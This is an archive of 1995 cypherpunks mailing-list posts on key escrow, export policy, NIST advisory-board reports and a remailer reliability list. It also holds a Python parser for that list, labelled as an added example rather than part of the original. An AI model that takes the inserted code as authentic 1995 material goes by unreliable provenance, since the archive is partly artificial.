two DBMS server products, Oracle7 and Trusted Oracle7,
in both the US and the UK.  Oracle used the US TCSEC TPEP
evaluation for B1 and C2 systems.  They also used the UK
ITSEC evaluation for E3 systems (which is the equivalent
for US B1 and C2 systems).  The UK process took
significantly less time and cost less money for an
identical product.  Ms. Vetter suggested that NIST/NSA
look into developing equivalent/comparable trust levels
between the two different evaluation criteria methods as
well as those for other countries.  This would minimize
the need to have different evaluations performed (one for
each country) for the same product.

Oracle has on-going work in other areas (e.g., RAMP, CMM,
ISO, and Audits) as well as multiple CLEFS with the UK,
Sweden, France and Germany.  Ms. Vetter explained the
differences in criteria between the TCSEC and the ITSEC. 
She said that the ITSEC requirements for the content of
evaluation deliverables formed a superset of the
corresponding TCSEC requirements for the evaluations. 
However, the TCSEC creates a framework for the
presentation of these requirements and there can be
little deviation from this.

Oracle would like to see more concentration on low-end
assurance requirements and processes.  This would enable
various sectors like health care, banking, and financial
industries to have protection for unclassified to
sensitive data.  Ms. Vetter encouraged NSA to continue
its efforts in modeling (Common Assurance Framework,
TCMM, and SE CMM) and would discourage any more efforts
in product profiling.  The modeling efforts encourage
vendor quality improvement, promote flexibility in
meeting assurance objectives, and are transferable to
other private sector domains besides DoD.  (See Reference
#8).


Wrap-up and Restatement of Issues

Dr. Katzke summarized the discussion of assurance by
saying that opportunities exist to look at alternatives. 
He is not sure what the government's role is or which
areas to concentrate on with respect to cost.  He said
that he could continue with the same level of effort that
is going on now with community involvement.  He is open
to suggestions with regard to the assurance process.


Discussion

After a lengthy discussion on the state of the Common
Criteria (CC) and assurance approaches and issues, some
of the major points from individual Board members
included:

-  Concern as to when the CC will be widely accepted and
   used;

-  Whether to adopt the ITSEC now and migrate to CC;

-  The need to simplify the CC;

-  Building assurance and quality into the new assurance
   framework;

-  Clearly define assurance needs to be universally
   understood;

-  Conduct more C2 and below evaluations in the US;

-  Concentrate on low-end assurance; and

-  Bring key industry players into the process.

[Snip]

Board members continued their discussion of criteria and
assurance from the previous day.  Some of the major
points of the discussion from Board members included the
need:

-  for OMB to state the need for C2 level evaluation
   compliance for various government product purchases;

-  for NSA to make a statement about equivalency among
   all existing non-US trust levels;

-  to begin using components of the Common Criteria and
   gradually migrate to it;

-  to continue a wide range of assurance framework
   options and procedures; and

-  to focus on low-end assurance methods and encourage C2
   level evaluation along the following Canadian AL-1
   evaluation.

[Snip]


Status of Key Escrow Initiative

Mr. Steve Walker, Trusted Information Systems (TIS),
briefed the Board on the status of Commercial Key Escrow
(CKE).  He said, with regard to application vendors, TIS
is actively seeking the participation of commercial
software vendors in widespread implementation of CKE
enabled software products.  TIS has installed a Data
Recovery Center (DRC) on the Internet and is prepared to
distribute sample DRC application software packages to
any interested software application developer.  TIS is
seeking approval of the US government for export of
application programs using encryption algorithms such as
the Data Encryption Standard (DES) when properly bound
with CKE.

Mr. Walker said the advantage of CKE for government
interests is that if the TIS CKE system were to become
widely used throughout the private sector and government
communities, law enforcement, national security and
private sector interests would be preserved.

Mr. Walker said that TIS has filed for patent protection
for its Software Key Escrow (Clipper equivalent) and CKE
systems including the DRC and application software
approaches.  TIS is prepared to license its CKE system
and software applications technology to any software or
hardware vendor under very favorable licensing terms. 
TIS is also prepared to license its DRC system and
technology to qualified DRC operators and vendors under
similarly favorable licensing terms.  (See Reference
#13).

[Snip]

----------

>From URL: http://csrc.ncsl.nist.gov/csspab/csspab.txt


            National Computer System Security
                and Privacy Advisory Board


Identifying Emerging Computer Security Issues

What is the Computer System Security and Privacy Advisory
Board (CSSPAB)?

Congress established the CSSPAB as a public advisory
board in the Computer Security Act of 1987.  The Board is
composed of twelve members, in addition to the
Chairperson, who are recognized experts in the fields of
computer and telecommunications systems security and
technology.

What is the Board's purpose?

The Computer Security Act specifies that the Board's
mission is to identify emerging managerial, technical,
administrative, and physical safeguard issues relative to
computer systems security and privacy.

What is the scope of the Board's authority?

The Board examines those issues affecting the security
and privacy of sensitive unclassified information in
federal computer and telecommunications systems.  The
Board's authority does not extend to private-sector
systems or federal systems which process classified
information.

What are the board's advisory and reporting functions?

The Board advises the Secretary of Commerce and the
Director of the National Institute of Standards and
Technology (NIST) on computer security and privacy issues
pertaining to sensitive unclassified information stored
or processed by federal computer systems. The Board
reports its findings to the Secretary of Commerce, the
Director of the Office of Management and Budget, the
Director of the National Security Agency, and appropriate
committees of Congress.

How often and where does the Board meet?

The Board holds its two-day meetings twice per year;
however, additional meetings may be called at the
Chairperson's discretion. Board meetings are held in the
Washington, DC metropolitan area as well as other areas
in which there is significant federal computer security
interest and activity.

Are Board meetings open to the public?

In accordance with the Federal Advisory Committee and
Government in Sunshine acts, Board meetings are announced
in the Federal Register and are normally open to the
public.  The Board accepts written statements from the
public (see address on reverse).

How is CSSPAB membership determined?

The Director of NIST of the Department of Commerce
appoints Board members for four-year terms.  By law, the
membership of the Board is distributed as follows:

-  Four experts from outside of federal government, one
   of whom is representative of a small- or medium-size firm;

-  Four non-government employees who are not employed by
   or a representative of a producer of computer or
   telecommunications equipment; and

-  Four members from the federal government, including
   one from the National Security Agency of the
   Department of Defense.

Nominations to fill vacancies on the Board may be
submitted to the Director of NIST.
NIST personnel serve as the Board's Secretariat.  Other
federal agency personnel may also assist the Board's
activities as specified in the Computer Security Act of
1987.

Are Board members paid for their service?

Board members do not receive a salary or stipend;
however, authorized travel expenses are reimbursed as
specified by Congress.

*******************************************************

For further information, please contact:

Computer System Security and Privacy Advisory Board

Executive Secretariat

National Computer Systems Laboratory
Technology Building, Room B-154
National Institute of Standards and Technology
Gaithersburg, MD  20899 













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 11 Sep 95 06:50:45 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199509111350.GAA28685@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"gondolin"} = "<mixmaster@gondolin.org> cpunk mix hash latent cut ek ksub reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: penet is *down* for a few days. Check back here for updates.

Last ping: Mon 11 Sep 95 4:00:27 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           *--****+**+*     9:23  99.99%
hacktic  remailer@utopia.hacktic.nl       *****+****+*    12:51  99.99%
hroller  hroller@c2.org                   **********+*     7:48  99.99%
syrinx   syrinx@c2.org                    ------++-++*  1:16:52  99.99%
c2       remail@c2.org                    +++++++++++*    39:22  99.99%
flame    remailer@flame.alias.net         ++++++*-+*+*  1:20:26  99.99%
spook    remailer@spook.alias.net         --.--+-----   3:55:18  99.99%
bsu-cs   nowhere@bsu-cs.bsu.edu           ***-******+*    13:02  99.98%
replay   remailer@replay.com              *****+****+*    15:04  99.93%
ideath   remailer@ideath.goldenbear.com   ----.---+---  3:51:00  99.83%
ncognito ncognito@gate.net                * ** ****++*     7:04  99.08%
rmadillo remailer@armadillo.com           ++ + *+++*++    54:25  99.06%
precip   mixmaster@mix.precipice.com                      52:55  99.07%
ford     remailer@bi-node.zerberus.de     **********+*     5:54  98.82%
crown    mixmaster@kether.alias.net       -- ---+--+--  3:32:46  98.04%
extropia remail@extropia.wimsey.com       _---.- -..-  12:48:37  97.01%
portal   hfinney@shell.portal.com         ****  *+ *+*     5:57  96.81%
vishnu   mixmaster@vishnu.alias.net        ---------+*  4:59:22  96.27%
robo     robo@c2.org                      **********+*    11:03  95.95%
rahul    homer@rahul.net                  +*+*******+*     6:52  99.99%
gondolin mixmaster@gondolin.org           -- . -+*--.   6:29:14  89.70%
mix      mixmaster@remail.obscura.com     ---+---___.  15:25:37  87.63%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
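
The listing format described above, as an added example that is not part of the original post and is not premail's own code: a Python parser for the `$remailer{...}` capability lines and the ping table, followed by a filter for chain candidates. The function names, the thresholds, and the policy of skipping remailers with an empty ping history are assumptions; the embedded data is an excerpt of the listing above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Excerpts of the listing above, embedded so the example runs offline.
CONFIG = r'''
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
$remailer{"precip"} = "<mixmaster@mix.precipice.com> cpunk mix pgp hash latent cut ek";
'''

PINGS = '''
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alumni   hal@alumni.caltech.edu           *--****+**+*     9:23  99.99%
hacktic  remailer@utopia.hacktic.nl       *****+****+*    12:51  99.99%
c2       remail@c2.org                    +++++++++++*    39:22  99.99%
flame    remailer@flame.alias.net         ++++++*-+*+*  1:20:26  99.99%
ncognito ncognito@gate.net                * ** ****++*     7:04  99.08%
precip   mixmaster@mix.precipice.com                      52:55  99.07%
rahul    homer@rahul.net                  +*+*******+*     6:52  99.99%
mix      mixmaster@remail.obscura.com     ---+---___.  15:25:37  87.63%
'''

CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
# The history column may contain spaces or be empty, so it is captured as
# "whatever sits between the address and the latency field".
PING_RE = re.compile(
    r'^(\S+)\s+(\S+@\S+)(.*?)\s+(\d+(?::\d\d){1,2})\s+(\d+(?:\.\d+)?)%\s*$')


@dataclass
class Remailer:
    name: str
    address: str
    flags: set
    key_id: str                       # PGP key ID to encrypt to
    history: str = ""
    latency_s: Optional[int] = None
    uptime: Optional[float] = None


def parse_config(text):
    """Parse the $remailer{"name"} = "<address> flags"; lines."""
    remailers = {}
    for line in text.splitlines():
        m = CONFIG_RE.match(line.strip())
        if not m:
            continue
        name, address, words = m.group(1), m.group(2), m.group(3).split()
        # "pgp." (trailing period) means the short name is the key ID.
        key_id = name if "pgp." in words else address
        flags = {w.rstrip(".") for w in words}
        remailers[name] = Remailer(name, address, flags, key_id)
    return remailers


def latency_seconds(text):
    """Convert "m:ss" or "h:mm:ss" to seconds."""
    secs = 0
    for part in text.split(":"):
        secs = secs * 60 + int(part)
    return secs


def merge_pings(text, remailers):
    """Attach history, latency and uptime from the ping table."""
    for line in text.splitlines():
        m = PING_RE.match(line)
        if not m or m.group(1) not in remailers:
            continue
        r = remailers[m.group(1)]
        if r.address != m.group(2):
            continue                  # table and config disagree: skip the stats
        r.history = m.group(3).strip()
        r.latency_s = latency_seconds(m.group(4))
        r.uptime = float(m.group(5))
    return remailers


def candidates(remailers, need=("cpunk", "pgp"), avoid=("mon", "filter"),
               min_uptime=99.0, max_latency_s=3600):
    """Remailers with every needed flag, no avoided flag, and good statistics.

    Assumed policy: an entry with no ping history is treated as unproven.
    """
    ok = [r for r in remailers.values()
          if r.uptime is not None
          and set(need) <= r.flags
          and not set(avoid) & r.flags
          and r.uptime >= min_uptime
          and r.latency_s <= max_latency_s
          and r.history]
    return sorted(ok, key=lambda r: (-r.uptime, r.latency_s))


if __name__ == "__main__":
    table = merge_pings(PINGS, parse_config(CONFIG))
    for r in candidates(table):
        print(r.name, r.key_id, r.latency_s, r.uptime)
```
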




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Mon, 11 Sep 95 04:03:33 PDT
To: hal9001@panix.com (Robert A. Rosenberg)
Subject: Re: Internet commerce mtg, Denver
In-Reply-To: <v02130500ac78bfb2b964@[166.84.254.3]>
Message-ID: <199509111101.HAA12452@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


> I see nothing wrong with doing something similar with Phone Books (and I
> seem to remember reading that has been done in the past).

More than that it is completely legal (to type in such a book).

Now back to cypherpunk topics

/hawk
-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 10 Sep 95 23:00:20 PDT
To: cypherpunks@toad.com
Subject: GAK Advisory Board 94
Message-ID: <199509110600.IAA03045@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>From URL: http://csrc.ncsl.nist.gov/csspab/94-rpt.txt


                   Executive Summary

This Annual Report documents activities of the National
Computer System Security and Privacy Advisory Board
during 1994, its sixth year.

During the year, the Board continued to review
cryptography related issues.  During 1994, the
Escrowed Encryption Standard (EES) and the Digital
Signature Standard (DSS) were approved as Federal
Information Processing Standards (FIPS 185) and (FIPS
186) respectively.  The Board heard briefings on
escrowing release procedures, escrow program procedures,
U.S. export procedures, international cryptography
proposals, international corporate key escrow,
alternative key escrow approaches, and software-based key
escrow encryption.

The Board also continued to follow activities related to
the Common Criteria (CC), which remains in draft form. 
[Comments on the CC will be reviewed and processed in
March 1995.] The Board continued to examine the
question as to whether there is a business case for
setting up a Trusted Technology Assessment Program
(TTAP).


Membership

Currently, Dr. Willis H. Ware, a senior researcher of the
Corporate Research Staff of RAND, serves as Chairman of
the Board.  He was appointed in July 1989.  As of
December 1994, the membership of the Board is as follows:

-  Chairman
   Willis H. Ware, RAND

-  Federal Members
   Charlie C. Baggett, Jr. National Security Agency
   Henry H. Philcox, Department of the Treasury, Internal
      Revenue Service
   Cynthia C. Rand, Department of Transportation
   Stephen A. Trodden, Department of Veterans Affairs

-  Non-Federal, Non-Vendor
   Genevieve M. Burns, Monsanto Corporation (Member
      Designate)
   Cris R. Castro, KPMG Peat Marwick
   Sandra Lambert, Citibank
   Randolph Sanovic, Mobil Corporation (Member Designate)

-  Non-Federal, Vendor
   Gaetano Gangemi, Wang Laboratories, Inc.
   Linda Vetter, Oracle Corporation (Member Designate)
   Stephen T. Walker, Trusted Information Systems, Inc.
   Bill Whitehurst, International Business Machines Corp.

In December of 1994, Ms. Cynthia Rand resigned from the
Board, leaving a vacancy in the federal member category.


              II. Major Issues Discussed

The work of the Board during 1994 was devoted to various
topics related to security of federal unclassified
automated information systems.  Among the most important
were:

-  Cryptographic Key Escrowing Procedures

-  Alternative Key Escrow

-  Security in the National Information Infrastructure
   (NII)

Escrowing Release/Program Procedures

The Department of Justice briefed the Board on procedures
for release of cryptographic key components, by the two
escrow agents, to government agencies.  The two escrow
agents are the National Institute of Standards and
Technology (NIST), of the Department of Commerce, and the
Automated Systems Division of the Department of Treasury.
The agents act under strict procedures to ensure the
security of the key components and which govern their
release for use in conjunction with lawful wiretaps.

NIST discussed the procedures for the key escrow program. 
Five federal agencies share a role in the key escrow
program:  (1) the Department of Justice is a sponsor and
a family key agent that holds one of the components of
the family key, (2) the Federal Bureau of Investigation
is the initial law enforcement user and a family key
agent that holds the other component of the family key,
(3) NIST has a dual role as the program manager and a key
escrow agent, (4) the Department of Treasury is a key
escrow agent; and (5) the National Security Agency
is the system developer that provides technical
assistance.


Alternative Key Escrow

Bankers Trust presented some rationales for key escrow
encryption for corporations, which fulfills management
supervision and compliance duties, and reduces business
risks.  They maintain that the Bankers Trust system can
meet both U.S. and European needs.  Their system has been
discussed with Canada, Britain, France, Singapore, and
the U.S.; however, none of these countries have
endorsed the system.

Trusted Information Systems, Inc. gave a demonstration
and overview of their approach to software-based key
escrow encryption.  They said that software key escrow
systems could be built that meet the objectives of law
enforcement.  Also, that variations of their software key
escrow system can provide a commercial key escrow
capability that will be very appealing to corporate and
individual computer users.  They believe that widespread
use of corporate key escrow, in which corporations
operate their own key escrow centers, and individual key
escrow, in which bonded commercial key escrow centers
provide a key retrieval capability for registered users,
will better achieve the key escrow objectives of law
enforcement than a government-operated key escrow
system.


[Snip 180kb of very informative docs on the main US
cryptography issues of 1994, still alive in '95.]













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Mon, 11 Sep 95 08:27:50 PDT
To: cypherpunks@toad.com
Subject: Clipper: the definitive meme
Message-ID: <199509111526.IAA17504@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



T-shirt!!  T-shirt!!

	Jim Gillogly
	Trewesday, 20 Halimath S.R. 1995, 15:26

------- Forwarded Message

From: wtshaw@aol.com (WTShaw)
Newsgroups: talk.politics.crypto
Subject: Re: Impressions of the NIST meeting
Date: 11 Sep 1995 04:50:27 -0400

In the world of Jet-Age crypto, the government offers up a biplane, and
seek to reserve the second seat for themselves.

------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 11 Sep 95 05:57:18 PDT
To: cypherpunks@toad.com
Subject: Media coverage of NIST Export meetings?
Message-ID: <32173.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone seen any media coverage of last week's meetings?
I haven't seen anything in either the Washington Post or
the Wall Street Journal. Nothing on radio or local TV either.

I don't expect much coverage, as Joe Sixpack has no knowledge of
why he should be interested. But I expected at least a paragraph
hidden somewhere inside.  Perhaps I missed it.

Anyone else seen any???

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 11 Sep 95 06:03:18 PDT
To: "Thaddeus J. Beier" <thad@hammerhead.com>
Subject: Re: 64 bit crypto
In-Reply-To: <199509110157.SAA01073@hammerhead.com>
Message-ID: <Pine.SUN.3.91.950911090108.24478A-100000@unix5.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Sep 1995, Thaddeus J. Beier wrote:

> Forgive a little bit of code...

Hey. It's C. That's what this mailing list is about, right? ;-)

> 		for(i = 0; i < 65536) {	/* stir the pot a long time */

                for (i = 0; i < 65536; i++) { /* stir the pot a long time */

Otherwise the loop will run a *long* time. Like infinity. :-)
--
Michael Handler <grendel@netaxs.com> Philadelphia, PA
Cypherpunks: Civil Liberty Through Complex Mathematics

                                            better living through cryptography




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Mon, 11 Sep 95 06:05:20 PDT
To: cypherpunks@toad.com
Subject: Cryptography Technical Report Server: Bad URL
Message-ID: <199509111304.JAA04118@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


My previous post about the Cryptography Technical Report Server (CTRS)
contained a bad URL, so some of you who tried to access it recently
weren't able to find it.  My apologies.

The problem has been fixed, though, so CTRS can now *really* be found at

		    <http://www.itribe.net/CTRS/>
				  or
		    <https://www.itribe.net/CTRS/>

We're upgrading our SPARC Webserver to a spiffy new Challenge-S, so
not only should you now have no problem finding CTRS, but it should
also respond pretty quickly.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 11 Sep 95 06:17:00 PDT
To: cypherpunks@toad.com
Subject: NYT on GAK
Message-ID: <199509111316.JAA02859@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 11, 1995, p. D7.


   Technology / Peter H. Lewis

   On The Net. Privacy for computers? Clinton sets the stage
   for a debate on data encryption.


   In terms of its ability to raise the nation's blood
   pressure, the debate over data encryption has not yet
   reached the same levels as gun control.

   But last week the Clinton Administration appeared to set
   the stage for an equally divisive debate over the degree to
   which businesses and individuals have the right to keep
   secrets when using telephones, computers and other forms of
   electronic communications.

   In two days of public hearings last week in Gaithersburg,
   Md., home of the National Institute of Standards and
   Technology, the Administration introduced its long-awaited
   proposals to relax restrictions on the export of
   cryptographic software.

   The Administration drew a line in the virtual sands of
   cyberspace, signaling that it is willing to permit
   Americans to put stronger cryptographic locks on their
   electronic data only if a spare key to those locks is made
   available on demand to law-enforcement agencies.

   There looms the conflict. Although the debate is about
   export controls the "export" issue is irrelevant in today's
   era of global electronic networks. Placing a common privacy
   program on an Internet computer in Austin, Tex., is
   effectively no different from sending a shrink-wrapped copy
   of the program to Moscow.

   The real issue is how much privacy the Government is
   willing to allow its own citizens, and the latest word from
   the Clinton Administration is that the right to electronic
   privacy, like the right to bear arms, is not absolute.

   Cryptography is the science of secret writing. In this
   digital era, it applies not just to notes, but also to
   telephone calls, money transfers, bank and credit card
   records, electronic mail, faxes and other computer files.

   The Clinton Administration's goal is to allow Americans to
   use the strongest possible cryptographic technology, while
   at the same time preserving the ability of law-enforcement
   agencies to perform court-authorized wiretaps as part of
   the effort to catch drug dealers, terrorists, child
   pornographers and other miscreants.
             
   In other words, it favors strong cryptography, but not too
   strong.

   The strength of cryptographic software is measured by the
   length of the software key necessary to encode and decode
   a message. The longer the key, the harder it is for an
   unauthorized user to decipher the message.

   In recent years, the Government has generally permitted
   Americans to export cryptographic software with key lengths
   up to 40 bits. Experts say that 40-bit keys are secure from
   casual snooping, but will fall quickly to a determined
   codebreaker.

   Last week, after more than a year of intense analysis, the
   Government introduced what it said was the best possible
   compromise.

   Under the new policy, companies can export encryption
   algorithms using 64-bit keys, which are much more secure,
   but only if spare keys are given to "escrow agents" who
   would make them available to law-enforcement agents under
   standard legal procedures, similar to legal wiretaps
   authorized by a judge. Otherwise, the 40-bit limit
   continues to apply.

   Such a "key escrow" scheme is anathema to many privacy
   advocates who fear Government abuses. The Government first
   proposed a key escrow system with its so-called Clipper
   Chip, a technology that failed to win acceptance even as a
   voluntary standard.

   The new scheme is somewhat more palatable than Clipper. Key
   escrow is still unpopular with American computer and
   software companies, which say it prevents them from
   competing against foreign companies that have no similar
   constraints, and with many multinational corporations,
   which say it prevents them from working with foreign
   companies that do not especially care for the idea of Uncle
   Sam holding the keys to their data banks.

   "If this was intended to be any sort of compromise, I don't
   think it achieved its end," said Whitfield Diffie, a Sun
   Microsystems engineer who attended the meetings. "I didn't
   see anybody who was enthusiastic."

   Raymond G. Kammer, deputy director of N.I.S.T., suggested
   that the hearings last week were intended to elicit public
   comment, and that the Administration's final position on
   cryptographic policy was still under analysis.

   But the emergence of key escrow issues at the N.I.S.T.
   proceedings suggests that key escrow is emerging as a
   nonnegotiable demand by some factions of the Clinton
   Administration, especially the Justice Department and the
   Federal Bureau of Investigation, led by Louis Freeh.

   "If this fails," said a figure familiar with the
   Administration's thinking on the proposed change in
   cryptographic policy, "it's going to lead to a very
   divisive debate. And the irony, for libertarians who oppose
   key escrow, is that if it fails, I am convinced that Louis
   Freeh cannot be true to his job without proposing domestic
   controls on data encryption."

   "He's not going to give up without a fight, and neither is
   the Justice Department," said the figure, who spoke on the
   condition he not be identified.

   Others say they do not think the Clinton Administration has
   yet arrived at a concrete position, even after more than a
   year of study and debate. "I don't think it's a final
   offer," said John Gilmore, an engineer at Cygnus Support,
   a computer company in Mountain View, Calif. "It looks to me
   like a weak strawman, a first offer, a proposal to dance."

   The question is whether American citizens and businesses
   have the patience to wait for the music to start. And the
   issue may be moot, anyway because the Internet is no more
   controlled by the United States than is the United Nations.

   "The Internet Architecture Board has specifically decided
   to ignore export controls in designing the security
   infrastructure for the next generation of Internet
   protocols," Mr. Gilmore said. "The Internet of 1998 will
   provide automatic, secure, and fully private communication,
   without key escrow, internationally."

   In other words, the Internet community is already planning
   to jump over the new line in the sand drawn last week by
   the Administration. Cryptography that is stronger than the
   Government's proposed system will be built into the
   Internet by a dozen countries, and American companies and
   individuals would be foolish not to use it.

   At that point, millions of Americans will come into direct
   conflict with Government policy, and the popular
   gun-control bumper sticker may be replaced by one that says
   "If cryptography is outlawed, only outlaws will have
   cryptography."

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Mon, 11 Sep 95 09:10:34 PDT
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Brian Davis' cypherpunk GAK proposal
In-Reply-To: <Pine.D-G.3.91.950903212120.8430B-100000@dg.thepoint.net>
Message-ID: </2DVwMz2Bo9Q083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Sep 1995 21:25:26 -0400 (EDT),
Brian Davis <bdavis@thepoint.net> wrote:
} 
} I, of course, know of the "dislike" of GAK here.  I am curious to know, 
} however, if the "dislike" is because government would have access under 
} any circumstances or if the primary worry is that government will cheat 
} and get access when most would agree that they shouldn't (either by the 
} judge "cheating" or a TLA stealing it).
 
You leave out something here when you say `the judge "cheating"'.
Most of the proposals and draft legislation include words like
"or by other lawful authority" along with the provisions empowering
judges to grant access to keys.  Some versions will list various 
combinations of the Attorney General, Director of {TLA}, etc, as
explicitly empowered.  Other versions don't explicate the phrase,
perhaps trusting that those with the need will already know where
their lawful authority lies -- maybe in an anti-terrorist Executive
Order; maybe in legislation authorizing military support in drug
interdiction; perhaps in their organization's charter to protect
"national security".

Part of the concern is that spooks will have routine access to keys
without any cheating -- no stealing or bent judges will be required.
The War on Drugs, the War on Firearms, the War on Terrorists
(on Money Launderers, on Pedophiles, on Spies) are just too important.

} In other words ... if it took agreement by a review board composed of 
} non-LEA members of this list, would the escrow be acceptable??

This would not be acceptable to the government.  Very many sincere,
